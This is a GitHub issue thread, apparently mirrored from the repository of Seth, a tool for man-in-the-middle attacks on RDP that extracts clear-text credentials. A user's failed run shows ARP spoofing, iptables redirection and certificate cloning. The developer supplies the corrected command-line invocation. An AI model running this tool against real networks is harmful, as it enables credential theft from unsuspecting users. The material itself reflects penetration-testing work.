SySS-Research / Seth

Perform a MitM attack and extract clear text credentials from RDP connections

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Help!!

lgcambero opened this issue · comments

Help.
It does not work, it does the ARP poisoning correctly.
Is there something I'm forgetting to set up ??.
Please provide more information, I'm just running ./seth.sh ...
Thank you!

:~/GitHub/Seth# ./seth.sh eth0 192.168.1.14 192.168.1.15 192.168.1.1
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Spoofing arp replies...
[
] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[
] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.1.13
[] Clone the x509 certificate of the original destination...
[
] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Waiting for connection

Hi! Looks like your RDP host has the IP address 192.168.1.13. Since it is on the same subnet, you need to use that address instead of the gateway IP. I guess I should specify that "gateway IP" means "host IP" if the host is on the same subnet.

So you need to call Seth by running ./seth.sh eth0 192.168.1.14 192.168.1.15 192.168.1.13

Let me know if that works.

I could solve it, it was just that, "Gateway-IP" sounds rather confusing. Excellent work!! Thank you!!.